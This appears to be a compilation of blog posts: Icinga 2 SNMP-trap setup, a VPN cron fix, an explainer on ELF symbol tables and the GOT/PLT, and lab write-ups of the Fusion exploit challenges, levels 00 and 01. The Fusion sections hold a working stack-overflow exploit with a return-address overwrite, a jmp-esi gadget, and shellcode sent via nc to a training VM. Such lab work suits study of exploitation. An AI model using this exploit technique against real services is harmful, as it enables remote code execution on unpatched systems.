Receive SNMP Traps with Icinga 2 on Ubuntu/Debian

Configure Icinga2 to Receive SNMP Traps on Ubuntu/Debian


I’m warning you up front, making this happen is a pain if you’re new to Icinga. I did my best to account for every nuance I ran into, but you may find something else. Feel free to comment if you need help.


Unfortunately, there is no official way for Icinga to receive SNMP traps. However, there is a pseudo official hack everyone uses to make it happen. Icinga is not meant to be a replacement for full scale SNMP management suites however, it can do a pretty good job. I originally wrote this as a word document and moved it over so the indents on the numbering below may be slightly off, but it’s all in the correct order.

Flow Synopsis

We’ll use a couple of programs in conjunction to make this happen. The device will generate SNMP traps and send them to the SNMP server, which in our example resides on the same box as Icinga. We will use snmptrapd as our SNMP trap server. We will configure the snmptrapd service with an SNMP trap handler. When snmptrapd receives an SNMP trap, it will forward the trap to the SNMP trap handler. In our case, we will use snmptt as the handler. This tool translates SNMP traps from an SNMP OID (more information here) to a meaningful set of text which represents the trap. snmptt will use an executable statement to determine what to do for that trap. Each trap will have a configurable executable statement (you can use wildcards).

In order to get Icinga to receive the alert, our executable statements in snmptt will call an Icinga event handler. This event handler will report the SNMP trap to a running Icinga service, which is what you’ll actually be able to see in Icinga itself.

Set up the SNMP Trap Daemon

Recall, the SNMP trap daemon is responsible for receiving SNMP traps from the target host.

  1. Start by installing the daemon itself with sudo apt-get install snmpd
  2. Edit the configuration for snmptrapd by running the following commands:
    1. vim /etc/snmp/snmptrapd.conf
    2. Add the following two lines. The traphandle line tells snmptrapd to feed any traps it receives to the /usr/sbin/snmptthandler program, which is part of the snmptt suite of tools we will install next. disableAuthorization yes tells snmptrapd to not screen incoming SNMP traps. You could set up snmptrapd to only receive SNMP traps from certain devices if you wanted to.
      1. traphandle default /usr/sbin/snmptthandler
      2. disableAuthorization yes
    3. The snmptrapd service script does not run properly. I haven’t taken the time to troubleshoot it, but you can run snmptrapd with snmptrapd -On -Lsd -p /var/run/ and the program will run properly.

Configure SNMPTT

SNMPTT will take the trap from snmptrapd (the trap handler) and convert it to a meaningful message which we can send to Icinga.

  1. Steps 3-5 describe manual installation of SNMPTT. This is usually not necessary. If you are not manually installing, skip to step 6. Download SNMPTT. You can download it from the command line with wget The file will download with a strange name, but it works if renamed to <anything>.tgz. Alternatively, download form their home page here
  2. Run the following commands to install SNMPTT
    1. sudo cp snmptt snmptthandler /usr/sbin/
    2. sudo chmod +x /usr/sbin/snmptt /usr/sbin/snmptthandler
    3. sudo cp snmptt.ini /etc/snmp/
    4. sudo cp snmpttconvertmib /usr/sbin
    5. sudo groupadd snmptt
    6. sudo useradd -g snmptt snmptt
    7. sudo chown snmptt:snmptt /etc/snmp/snmptt.ini
    8. sudo mkdir /var/spool/snmptt
    9. sudo chown snmptt:snmptt /var/spool/snmptt/
    10. sudo vim /etc/snmp/snmptt.ini
      1. Change the line mode = standalone to mode=daemon
      2. If you want to change the DNS settings, change the line dns_enable = 0 to dns_enable = 1 and set strip_domain to 1
      3. Set syslog_enable to 0 if you do not have syslog set up
  1. Fix missing perl dependencies by running the following commands. SNMPTT ships with missing dependencies so they must be installed.
    1. sudo cpan install List::Util
    2. sudo cpan install Config::IniFiles
  2. Install SNMPTT by running the command sudo apt-get install snmptt
  3. Install the MIBs you would like to monitor
    1. sudo mkdir ~/.snmp
    2. sudo mkdir ~/.snmp/mibs The reason we created this folder is that we are going to use the snmptranslate tool to take the .my files we download and translate them into usable statements for the SNMPTT tool. The snmptranslate tool checks two directories for MIB files $HOME/.snmp/mibs and /usr/local/share/snmp/mibs.
    3. Download the .my files from the web. For my server, I used the Cisco MIB files, which can be downloaded from Change to the directory above and then run wget
      1. If using the files from Cisco, simply extract the archive and then move all the .my files from the extracted folder to ~/.snmp/mibs
    4. Create a script to convert all of the MIB files to usable SNMPTT data
      1. vim
      2. Add the following lines to the script. Where it says, <YOUR-SERVICE-NAME>, this is the name of the service, which Icinga will run to receive the SNMP traps. In my case, I named the service snmp_traps. The name can be anything. This script runs the snmpttconvertmib command on every .my file in a target folder.

for f in *.my
echo “Processing $f”
snmpttconvertmib –in=$f –out=/etc/snmp/snmptt.conf
–exec=’/usr/lib/nagios/plugins/submit_check_result_2 $r

  1. Save the following script as submit_check_result_2 in /usr/lib/Nagios/plugins/. This script is what the –exec line in the above script points to. The above script will modify snmptt.conf, which will contain a series of execution statements. These execution statements run anytime SNMPTT receives a trap, which matches the clause for the corresponding execution statement. The below script actually submits the trap to Icinga

# Written by Ethan Galstad (
# Last Modified: 26 Oct 15
# This script will write a command to the Nagios command
# file to cause Nagios to process a passive service check
# result.  Note: This script is intended to be run on the
# same host that is running Nagios.  If you want to
# submit passive check results from a remote machine, look
# at using the nsca addon.

# Arguments:
#  $1 = host_name (Short name of host that the service is
#       associated with)
#  $2 = svc_description (Description of the service)
#  $3 = return_code (An integer that determines the state
#       of the service check, 0=OK, 1=WARNING, 2=CRITICAL,
#       3=UNKNOWN).
#  $4 = plugin_output (A text string that should be used
#       as the plugin output for the service check)

# get the current date/time in seconds since UNIX epoch
datetime=`date +%s`
# create the command line to add to the command file
cmdline=”[$datetime] PROCESS_SERVICE_CHECK_RESULT;$1;$2;$3;$4″
# append the command to the end of the command file
`$echocmd $cmdline >> $CommandFile`

  1. Run the command sudo chmod +x /usr/lib/nagios/plugins/submit_check_result_2
  2. Navigate to ~/.snmp/mibs and run the snmptt-convert-script within the folder. The script will then process all the .my files in the directory. Some may fail and depending on which MIB you downloaded that’s fine. Not all entries will be processed. You can confirm the command ran successfully by checking the file /etc/snmp/snmptt.conf. The processed entries should appear there
  3. (Optional) Add a catchall definition by adding the following lines to your snmptt.conf file:

EVENT CatchAll .1.* “SNMP Traps” Critical
EXEC /usr/local/nagios/plugins/submit_check_result_2 “$r” “snmp_traps” 2 “$O: $1 $2 $3 $4 $5”

  1. Run SNMPTT with the command: sudo /usr/sbin/snmptt –daemon –debug=1 –debugfile=/var/log/snmptt.log Note: This is only necessary for manual installs or if you do not have it installed as a service. If you installed it via aptitude, go to step 10.
  2. Run SNMPTT with sudo service snmptt start

Configure Icinga 2 to Receive the Alerts

Icinga receives the alert from SNMPTT via the command file at /var/run/icinga2/cmd/icinga2.cmd. We will use a passive service to check this file for new SNMP traps and then Icinga will report them.

  1. Edit the Icinga2 template file at /etc/icinga2/conf.d/templates.conf with vim /etc/icinga2/conf.d/templates.conf
  2. Add the following template to the file:

template Service “snmp-trap-service” {
import “generic-service”
check_command         = “passive”
enable_notifications  = 1
enable_active_checks  = 1
enable_passive_checks = 1
enable_flapping       = 0
volatile              = 1
max_check_attempts    = 1
check_interval        = 87000
enable_perfdata       = 0
vars.sla              = “24×7”
vars.dummy_state      = 2
vars.dummy_text       = “No passive check result received.”

apply Service “snmp_traps” {
import “snmp-trap-service”
assign where host.address

  1. In the snmp_traps service apply statement, the configuration applies the snmp-trap-service to all Icinga provides more details here.
  2. This configuration only works if the host name configured for the hosts object is the same as the incoming SNMP trap host name. If the two do not match, Icinga will discard the trap. On my configuration my Cisco 1721 sent a host name of so my host name for my Icinga configuration had to be object Host “″ {

Icinga “ did not exit properly error”

I got this and it took some time to troubleshoot. The error is misleading. What it’s really telling you is that the plugin failed to execute properly. Here’s the catch, this includes warnings. So if you manually test the plugin from the command line outside of Icinga and it works, but gives a warning, when you run it with Icinga it will fail and throw the aforementioned error. To fix the problem, you have to fix whatever is in the code giving the warning.

Netint Plugin throws did not exit properly error

This was the specific problem I was having trouble with. I ran it on the command line and got some errors about an uninitialized variable. On line 2023  you’ll see a line with the variable $oid_perf_inoct. That is the offending variable. You need to add an additional if statement outside this one. Enclose the whole thing in an if block of

if (defined $oid_perf_inoct[$I]) {
//All that other stuff from the if block on line 2023

It worked for me after that.

Configuring Icinga for Cisco SNMP

Original Error: “CRITICAL – Plugin timed out while executing system call”

I had a bit of trouble getting this to work so I thought I would share my solution. I initially followed the tutorial here. I basically wanted to Icinga to receive SNMP data from a Cisco 7200 I had set up.

To begin, set up your Cisco router according to this tutorial.

You can then begin setting up your monitoring services according to the tutorial I listed above.

Here’s where it differs. I found that the line:

check_command check_snmp!-C public -o sysUpTime.0

did not work. I discovered you can test the plugins manually by migrating to your plugin directory and doing something like the following:

/usr/lib/nagios/plugins/check_snmp <COMMAND ARGUMENTS HERE>

In this way, if you want to try something new, you can run it manually first to see if it works.

I could not get a named identifier to work with the command so I ended up using the following in my config for Icinga:

check_command     check_snmp!-H <IP_ADDRESS_of_TARGET_HOST> -P 2c -C <COMMUNITY_STRING_HERE> -o .

The numbers at the end are the OID tree value corresponding to sysUpTime. You can view the tree here. You may notice there is an additional 0 at the end. This is the index number.


Stop Ubuntu 14.04 VPN From Dying

The title of my post is a bit misleading, but it’s my solution to the problem. I found that my VPN would randomly die on Ubuntu. I could ping the network internal, but everything external was dead. What I did was add a cron job which checks every minute if the interface is up and if it isn’t, restart the VPN.

Type: sudo crontab -e

Add the line:

* * * * * if !(grep -q <VPN_INTERFACE_NAME> /proc/net/dev); then nmcli con up id <VPN_NAME>; fi

You can check a list of your interface names with nmcli con. The line basically says, check if my VPN is in the list of available interfaces, if it isn’t bring it up.

Hope this helps.

What is the Symbol Table and What is the Global Offset Table?


When I first sought to understand the symbol table and the global offset table (GOT) I found bits and pieces of information, but I had trouble getting the whole picture. As I understood what the symbol table/GOT are, I realized it is easier to describe the symbol table/GOT in the context of the linking and loading process for which they are used. That’s what this post does. It will explain the why of the symbol table/GOT to help you understand them in context.

Most of the credit goes to the authors of the posts of which this one is an amalgamation of. This is more a collection of pieces of information to hopefully paint a clearer picture of the whole.

The Linking Process

If you aren’t already familiar with the C++ compilation process see this and this (they’re short :-D). You’ll need to understand that to understand this.

Relocation Records

Object files contain references to each other’s code and data. Due to this, the linker must combine them at link time. After linking all of the object files together, the linker uses the relocation records to find all of the addresses that need to be filled in.

The Symbol Table

Since assembling to machine code removes all traces of labels from the code, the object file format has to keep these around in a different place.  It does this in the form of the symbol table, a list of names and their corresponding offsets in the text and data segments. (Source)

To recap an important concept, an executable file is made up of several object files. You might have two object files and a c library that are all combined by the linker at link time into one executable file.

Shared Objects

Most systems run a number of programs at any given time. If you’re familiar with programming, it probably comes as no surprise to you that these programs each use many of the same libraries. For example, many programs use the standard C library which exports functions like printf and malloc. Naturally, we must then have a copy of the C library within the running memory of each of these programs. After all I said earlier that we combine object files and libraries to create executable files. However, this is a mammoth waste of resources so instead each program has a reference to this common library instead of each program having a copy of the library.

Static Linking vs Dynamic Linking

In a statically linked scenario a program and the particular library it is using are combined by the linker at link time. By contrast, a dynamically linked library (in Windows a .dll file and in Linux a .so file) is linked when the executable runs.

The linker binds statically linked libraries with the program at link time (which comes directly after compilation/assembly). The largest advantage of static linking is that you can be certain what version of the library is present. This means that DLL Hell/Depedency Hell isn’t a problem for statically linked executables. This also means the executable exists as a single file rather than several files. Additionally, statically linked executables only contain those parts of the library it needs to execute whereas dynamically linked libraries must load the entire library at runtime because it is not known in advance which functions the application will invoke.

On the downside, statically linked executables are much larger because they carry with them all of their library code. Additionally, in order to update the executable you must recompile/link it.

The term ‘dynamically linked’ means that the program and the particular library it references are not combined together by the linker at link time. Instead, the linker places information into the executable that tells the loader which shared object module the code is in and which runtime linker should be used to find and bind the references. (Source) This means that the linker finds the shared object and binds it to the executable and binds it at runtime. This type of program is also called a partially bound executable because it isn’t fully bound at link time. The linker did not resolve all the referenced symbols at link time. Instead the linker made a reference to the shared object and placed those in the executable. There are four main advantages to using dynamically linked executables.

  1. The executable is smaller
  2. Libraries may be upgraded or patched without having to relink all of the executables which depend on them. In the same vein, you don’t have to distribute the source code of the libraries – you only need the compiled binary version.
  3. Programmers must only deliver the unique libraries with their code. The programmer may assume that standard libraries will already be on the system.
  4. When combined with virtual memory, dynamic linking permits two or more processes to share read-only executables such as the standard C library or the kernel. This means memory must only retain one copy of the executable in memory rather than one for each process.

The Executable and Linkable Format (ELF) File Format

I’ll start by saying if you’re on Windows you’ll be using the PE/COFF file format. Most of the principles explained here conceptually port over to the PE/COFF format.

In order to fully understand shared objects, the symbol table and the GoT, you have to understand the ELF file format. The ELF specification defines the layout of an object file and its subsequent executable. It is the way we standardize the executables across systems, typically in the case of the ELF format, Linux systems. The ELF file format is fairly complicated and you can read about it in extreme detail here. In this post, I will settle for the parts relevant to the symbol table and the GoT.

Section vs Segment

Within the ELF format there are two ways to view the object file/executable, either the linking view or the execution view. Below is a diagram of the comparison



ELF uses the link view at static linking time for relocatable file combination and the execution view at run time to load and execute programs. The linking view by and large deals with sections whereas the execution view deals with segments. Sections provide the information needed at link time and segments the information needed at runtime.

Sections have a name and type, a requested memory location at run time, and permissions. You can locate the sections by examining the section header table. Each section has:

  • One section header describing it. Section headers may exist without a section.
  • Each section occupies one contiguous (possibly empty) sequence of bytes in a file.
  • Will not overlap
  • May have inactive space. The various headers and the sections might not cover every byte in an object file.

Segments group related sections. For example, the text segment groups executable code, the data segment groups the program data, and the dynamic segment groups information relevant to dynamic loading. Each section consists of one or more sections. In this post, we are primarily interested in the PT_DYNAMIC type segment.

Process Image and the Dynamic Linker

The process image is created by loading and interpreting the segments. When building an executable file that uses dynamic linking, the link editor adds a program header element of type PT_INTERP to an executable file, telling the system to invoke the dynamic linker as the program interpreter. The dynamic linker creates the process image for a program.  At link time, the program or library is built by merging together sections with similar attributes into segments. Typically, all the executable and read-only data sections are combined into a single text segment, while the data and BSS are combined into the data segment. These segments are normally called load segments, because they need to be loaded in memory at process creation. Other sections such as symbol information and debugging sections are merged into other, non-load segments. (Source)

Creating the process image entails the following activities (source):

  • Adding the executable file’s memory segments to the process image
  • Adding shared object memory segments to the process image
  • Performing relocations for the executable file and its shared objects
  • Closing the file descriptor that was used to read the executable file, if one was given to the dynamic linker
  • Transferring control to the program, making it look as if the program had received control directly form exec(BA_OS)

There are three sections we care about specifically in this post:

  • .dynamic: The structure residing at the beginning of the section holds the addresses of other dynamic linking information.
  • .got and .plt (procedure linkage table): .got stores the addresses of system functions and the .plt stores indirect links into the GoT

Shared objects may occupy virtual memory addresses that are different from the addresses recorded in the file’s program header table. The dynamic linker relocates the memory image, updating absolute addresses before the application gains control. Although the absolute address values would be correct if the library were loaded at the addresses specified in the program header table, this normally is not the case.

The Global Offset Table (GOT)

The GOT is a table of addresses which resides in the data section. If some instruction in code wants to refer to a variable it must normally use an absolute memory address. Instead of referring to the absolute memory address, it refers to the GOT, whose location is known. The relative location of the GOT from the instruction in question is constant.

Now you might be thinking, “Great, but I still have to resolve all those addresses within the GOT so what’s the point?” There are two things using the GOT gets us.

  1. We must relocate every reference in the code section. If everything references in the GOT we only must update the GOT once. This is much more efficient.
  2. The data section is both writable and not shared between processes. Performing relocations in this section causes no harm whereas in the code section relocations disallow sharing, which defeats the process of a shared library.

Here is an example I pulled from Eli Bendersky’s explanation:

In pseudo-assembly, we replace an absolute addressing instruction:

; Place the value of the variable in edx
mov edx, [ADDR_OF_VAR]

With displacement addressing from a register, along with an extra indirection:

; 1. Somehow get the address of the GOT into ebx
lea ebx, ADDR_OF_GOT

; 2. Suppose ADDR_OF_VAR is stored at offset 0x10
;    in the GOT. Then this will place ADDR_OF_VAR
;    into edx.
mov edx, DWORD PTR [ebx + 0x10]

; 3. Finally, access the variable and place its
;    value into edx.
mov edx, DWORD PTR [edx]

If you would like to see the rest of the process in a high level of detail I strongly suggest taking a look at Eli Bendersky’s under the section titled “PIC with data references through GOT – an example”

This is straightforward enough for global variables, but what about function calls? Theoretically, things could work the same way, but they’re actually a bit more complicated.

The Procedure Linkage Table (PLT)

The PLT is part of the executable text section, containing an entry for each external function the shared library calls. Each PLT entry is a short chunk of executable code. Instead of calling the function directly, the code calls an entry in the PLT, which then calls the actual function. Each entry in the PLT also has a corresponding entry in the GOT which contains the actual offset to the function, but only after the dynamic loader has resolved it.

The PLT uses what is called lazy resolution. It won’t actually resolve the address of a function until it absolutely has to. This makes it so effort is only put into resolving those functions actually used. The process works in the following manner:

  1. A function func is called and the compiler translates this to a call to func@plt.
  2. The program jumps to the PLT. The PLT points to the GOT. If the function hasn’t been previously called, the GOT points back into the PLT to a resolver routine, otherwise it points to the function itself.
  3. If the function hasn’t been previously called, the program jumps back from the GOT to the PLT, which then runs a resolver routine to update the GOT entry with actual address of the function.

The reason we use this lazy initialization is that it saves us the trouble of resolving all the functions that aren’t actually used during runtime.

Again, if you would like to see a specific example, I strongly recommend Eli Bendersky’s article. Look under the section “PIC with function calls through PLT and GOT – an example”

Other Sources


Fusion Exploit Challenges Level 01

Some GDB Housekeeping

When I first started this challenge, I was quite thrown off. I started debugging with GDB and my level00 exploit worked perfectly as is. In fact, after closer inspection I realized that none of the addresses from level00 were different in level01. I figured this wasn’t a coincidence. After running my exploit against the code outside of GDB and it not working I guessed what was going on – GDB disables ASLR to make debugging easier. My first step was to turn it back on so I could see what was going on.

set disable-randomization off

If you have a previously running level01 which you opened with gdb at any juncture before using the disable-randomization command you’ll need to kill that instance of level and open a new one. Once GDB opens a process it seems to rebase it.

Once I did that and reexamined the crash from level00 I saw that my return address took me to non-existent memory:

(gdb) c
[New process 15084]
[Switching to process 15084]

Breakpoint 1, 0x08049854 in fix_path (path=Cannot access memory at address 0x41414149
) at level01/level01.c:9
9 in level01/level01.c
(gdb) stepi
0xbffff3ec in ?? ()
(gdb) x/40x $eip
0xbffff3ec: Cannot access memory at address 0xbffff3ec

Poking Around

Our stack has indeed changed. Now we must find a way to make it to our shellcode. An examination of the stack pointer reveals the new location of our shellcode.

(gdb) x/300x $esp
0xbff0a7d0: 0xbff0a700 0x00000020 0x00000004 0x001761e4
0xbff0a7e0: 0x001761e4 0x000027d8 0x20544547 0x41414141
0xbff0a7f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a800: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a810: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a820: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a830: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a840: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a850: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a860: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a870: 0x41414141 0xec414141 0x00bffff3 0x50545448
0xbff0a880: 0x312e312f 0x43430a0d 0x43434343 0x43434343
0xbff0a890: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8a0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8b0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8c0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8d0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8e0: 0x43434343 0x43434343 0x43434343 0x43434343

In my case the 0x43s represent where the shellcode would sit. My next step was to examine the registers. The reason being, the challenge only enabled ASLR on stack, heap, and memmap. That means that everything else should still be static. If I can find a register that contains my shellcode I could potential find a gadget which jumps to that register to get to my shellcode.

(gdb) info registers
eax 0x1 1
ecx 0xb76b78d0 -1217693488
edx 0xbff0a7d0 -1074747440
ebx 0xb782fff4 -1216151564
esp 0xbff0a7d0 0xbff0a7d0
ebp 0x41414141 0x41414141
esi 0xbff0a884 -1074747260
edi 0x8049ed1 134520529
eip 0xbffff3ec 0xbffff3ec
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

Ah ha! There are several promising candidates from our lineup of registers. It looks like edx, esp, or esi could work. Additionally, we control the value of ebp so we could make use of it as well potentially. There are much fancier ways to do this, but I just used objdump to look for gadgets:

root@fusion:/opt/fusion/bin# objdump -D level01 | grep jmp

8049464: e9 3a ff ff ff jmp 80493a3 <serve_forever+0x14>
80495ff: eb 05 jmp 8049606 <is_restarted_process+0x53>
804962d: eb 44 jmp 8049673 <nread+0x66>
80496a0: eb 44 jmp 80496e6 <nwrite+0x66>
80497c9: eb 09 jmp 80497d4 <secure_srand+0xe1>
804983c: eb 15 jmp 8049853 <fix_path+0x3e>
8049a31: eb 0d jmp 8049a40 <__libc_csu_fini>
8049f0d: e9 ff ff d4 00 jmp 8d99f11 <_end+0xd4ea65>
8049f5f: ff 28 ljmp *(%eax)
8049f7f: ff ac 02 00 00 e2 f8 ljmp *-0x71e0000(%edx,%eax,1)
804a063: ff ab 00 00 00 00 ljmp *0x0(%ebx)
804a0cf: ff 6c 01 00 ljmp *0x0(%ecx,%eax,1)
804a1b7: ff ef ljmp *<internal disassembler error>
804a217: ff 25 01 00 00 00 jmp *0x1
804a25f: ff 61 00 jmp *0x0(%ecx)
804b302: ff 6f 8c ljmp *-0x74(%edi)
804b36a: ff 6f d4 ljmp *-0x2c(%edi)
804b372: ff 6f 01 ljmp *0x1(%edi)
804b37a: ff 6f 70 ljmp *0x70(%edi)
1b8f: ff 21 jmp *(%ecx)
230f: ff a5 8f 00 00 80 jmp *-0x7fffff71(%ebp)
254f: ff ee ljmp *<internal disassembler error>
27e3: ff ab 90 00 00 80 ljmp *-0x7fffff70(%ebx)

Glancing through this, none of those jmps are exactly what I’m looking for so I decided to kick up the fancy levels a bit. What about the shared libraries? Those should be loaded in static locations as well.

info sinfo sharedlibrary
From To Syms Read Shared Object Library
0xb76cebe0 0xb77db784 Yes /lib/i386-linux-gnu/
0xb7841830 0xb78585cf Yes (*) /lib/
(*): Shared library is missing debugging information.

Check that out. Libc is loaded into memory. I would find it very difficult to believe that libc doesn’t have what we’re looking for. After further examining the registers ESI is easily the most promising, but there is a small problem.

x/80x $esi
0xbff0a884: 0x43430a0d 0x43434343 0x43434343 0x43434343
0xbff0a894: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8a4: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8b4: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8c4: 0x43434343 0x43434343 0x43434343 0x43434343

There are some garbage bits written at the beginning of the address space. So if we jump directly to ESI we’re going to immediately crash. So what we need is a jump to ESI at a short offset in. Again, given the size of libc, I’m guessing that won’t be hard to do.

objdump -D /lib/i386-linux-gnu/ | grep jmp | grep esi
1536cf:       ff 6e 06                ljmp   *0x6(%esi)

Indeed it was not. This should do exactly what we want. Now we need to figure out where libc was loaded:

(gdb) info proc mapping libc
process 15084
cmdline = ‘./level01’
cwd = ‘/’
exe = ‘/opt/fusion/bin/level01’
Mapped address spaces:

Start Addr End Addr Size Offset objfile
0x8048000 0x804b000 0x3000 0 /opt/fusion/bin/level01
0x804b000 0x804c000 0x1000 0x2000 /opt/fusion/bin/level01
0xb76b7000 0xb76b8000 0x1000 0
0xb76b8000 0xb782e000 0x176000 0 /lib/i386-linux-gnu/
0xb782e000 0xb7830000 0x2000 0x176000 /lib/i386-linux-gnu/
0xb7830000 0xb7831000 0x1000 0x178000 /lib/i386-linux-gnu/
0xb7831000 0xb7834000 0x3000 0
0xb783e000 0xb7840000 0x2000 0
0xb7840000 0xb7841000 0x1000 0 [vdso]
0xb7841000 0xb785f000 0x1e000 0 /lib/i386-linux-gnu/
0xb785f000 0xb7860000 0x1000 0x1d000 /lib/i386-linux-gnu/
0xb7860000 0xb7861000 0x1000 0x1e000 /lib/i386-linux-gnu/
0xbfeeb000 0xbff0c000 0x21000 0 [stack]

That’s a little difficult to read, but libc was loaded at 0xb76b8000. Now I confirm our jump is indeed where I think it is:

(gdb) x/i 0xb76b8000+0x1536cf
0xb780b6cf: jmp FWORD PTR [esi+0x6]

At first I thought this would work. Unfortunately, that jumps to the address of whatever is at the pointer esi+0x6… which in our case is 43434343 for testing purposes. We just want to jump to ESI. Unfortunately, I could find no jumps to match that criteria. Unfortunately, the straight jmp esis didn’t come with an offset, but we can work with that. In fact, after looking at the instruction made by the garbage bits (which seemed to be constant), it comes out as valid and executable.

root@fusion:/opt/fusion/bin# objdump -D /lib/i386-linux-gnu/ | grep jmp | grep esi | grep e6 | grep -v “(”
77b63: ff e6 jmp *%esi

(gdb) x/i 0xb76b8000+0x77b63
0xb772fb63 <_wordcopy_fwd_aligned+51>: jmp esi

I went ahead and tested this and unfortunately found it still segfaults. After killing the process and reexamining the location of libc I found it had moved! It appears the location of all the libraries is still randomized. At this juncture I realized my original tactics wouldn’t work. The only module whose location doesn’t change is level01 itself.  I found a better way of doing things and used msfelfscan to check for jmps in the level01 module:

root@fusion:/opt/fusion/bin# /opt/metasploit-framework/msfelfscan -j esi,esp,eax,edx,edi,ecx level01
0x08048c1f call eax
0x08049a6b call eax
0x08049f4f jmp esp

Not many options unfortunately. On a whim though I checked out ESP:

(gdb) x/8x $esp
0xbfc653fc: 0x08049f4f 0xbfc65400 0x00000020 0x00000004
0xbfc6540c: 0x00000000 0x001761e4 0xbfc654a0 0x20544547

It looks like I may control the last two bytes of what ESP points to. For giggles, I threw in \xFF\xE6 right after my return address. FFE6 is the assembly for jmp ESI. To my surprise, it worked! I successfully jumped from ESP to ESI to the buffer I controlled!

fusion@fusion:~$ python -c ‘print “GET ” + “A”*139 + “\x4f\x9f\x04\x08” + “\xFF\xE6″ + ” HTTP/1.1\r\n” + “\x59\x53\x4f\x42\x59\x1e\x51\x5d\x0e\x60\x1e\x47\x5d\x90\x46\x92\x57\x56\x91\x47\x60\x4f\x98\x48\x5f\xd6\x5f\x48\x46\x91\x49\x58\x06\x4f\x5b\x5e\x9f\x51\x5e\x5b\x60\x4d\x93\x41\x5f\xfd\x55\xfc\x55\xfc\xdb\xca\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x14\xbf\x05\x58\xc6\x87\x31\x7d\x19\x03\x7d\x19\x83\xed\xfc\xe7\xad\xf7\x5c\x10\xae\xab\x21\x8d\x5b\x4e\x2f\xd0\x2c\x28\xe2\x92\x16\xeb\xae\xfa\xaa\x13\x5e\xa6\xc0\x03\x31\x06\x9c\xc5\xdb\xc0\xc6\xc8\x9c\x85\xb6\xd6\x2f\x91\x88\xb1\x82\x19\xab\x8d\x7b\xd4\xac\x7d\xda\x8c\x93\xd9\x10\xd0\xa5\xa0\x52\xb8\x1a\x7c\xd0\x50\x0d\xad\x74\xc9\xa3\x38\x9b\x59\x6f\xb2\xbd\xe9\x84\x09\xbd”‘ | nc 20001

I tested it outside of GDB and it worked like a champ!


Fusion Exploit Challenges Level00 Solution



I began by looking for the port level00 listened on. However, it was not in the source code. I found it by running a netstat -tulpn:


From the output you can see level00 listens on port 20000. We could have also found this by setting a breakpoint on SERVE_FOREVER and examining the port passed to it. After looking through the code, I determined the vulnerable function was fix_path. It performs a strcpy with no bounds checking of any type assuming realpath does not truncate our input in any way. In order to reach that code, I began by constructing a string with python. I started with:

python -c ‘print “GET  HTTP/1.1 ” + “A”*300’ | nc 20000

NOTE: There must be two spaces after the GET statement! If you look at the code it looks for “GET “, but then uses strchr to search for the first instance of a space after the first 4 characters. If there aren’t two spaces after GET it grabs the As and compares those to the HTTP statement instead of the HTTP characters.

One interesting part of the code is the location where the strncmp should be in parse_http_request. It looks like the following:

0x08049925 <+208>: add DWORD PTR [ebp-0x10],0x1
0x08049929 <+212>: mov eax,DWORD PTR [ebp-0x10]
0x0804992c <+215>: mov edx,eax
0x0804992e <+217>: mov eax,0x8049efd
0x08049933 <+222>: mov ecx,0x8
0x08049938 <+227>: mov esi,edx
0x0804993a <+229>: mov edi,eax
0x0804993c <+231>: repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
0x0804993e <+233>: seta dl
0x08049941 <+236>: setb al
0x08049944 <+239>: mov ecx,edx
0x08049946 <+241>: sub cl,al
0x08049948 <+243>: mov eax,ecx
0x0804994a <+245>: movsx eax,al
0x0804994d <+248>: test eax,eax
0x0804994f <+250>: je 0x8049965 <parse_http_request+272>

It took me a bit to understand what I was looking at. The code was compiled statically. The code includes the function definition inline rather than calling it externally.

When I ran the command it unfortunately only returned the words “trying to access”. My suspicion at this point is that we have to find a way to do something with the strcpy. We know this is a stack based buffer overflow and we know the path variable points to something on the stack.

I turned my attention to the realpath function to determine what it was doing. I followed the first call in realpath and saw __i686.get_pc_thunk.bx. Unsure of what that was I did a quick Google search:

“This call is used in position-independent code on x86. It loads the position of the code into the %ebx register, which allows global objects (which have a fixed offset from the code) to be accessed as an offset from that register.”

I then realized that realpath is a native Linux command that simply takes a canonical name and converts it to an actual path. This is obvious in hindsight, but I then figured out I need to feed the program a properly formatted HTTP request. Here’s what I sent:

python -c ‘print “GET ” + “/home/fusion/” + “A”*500 + ” HTTP/1.1\r\n”‘ | nc 20000

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

I did a p path to determine the path variable path points to location 0xbffff34c. The next step is to determine where the return pointer to parse_http_request is. I placed a breakpoint on parse_http_request and then examined the top of the stack to determine the return address is at 0xbffff75c. The difference  between the two is 1040 bytes. This doesn’t seem right? My buffer is only 500ish bytes. This isn’t the return address we’re overwriting!

I stepped through the program to discover that the crash actually at the return for fix_path. This threw me off because the return address for fix_path must be at a lower address then the buffer path because path was allocated first. Therefore our buffer overflow shouldn’t affect this address.

I concluded the overflow must actually occur in the resolved buffer. I found the return address of fix_path to be 0xbffff32c. I then decided to check the value of the return address for fix_path before and after the call to realpath, my suspicion being that path must be copied into resolved at some juncture.

My assumption was correct. x/x 0xbffff32c showed a value of 0x70 (the last byte of the return address) before the call to realpath and then a value of 0x41 after it. This is where our bug is!

x/x resolved  showed the address of resolve to be 0xbffff2a0. This means there’s a difference of 140 bytes between the start of our target buffer and where the return address is. This jives with what we know about the size of our buffers. I ran the following command:

python -c ‘print “GET ” + “/home/fusion/” + “A”*140 + “BBBB” + ” HTTP/1.1\r\n”‘ | nc 20000

However, I still found the crash occurred with As in the buffer. It was indeed 140 bytes. Now we need to get our exploit code working. We’ll use Cs to simulate the code. I ran the program with the following command:

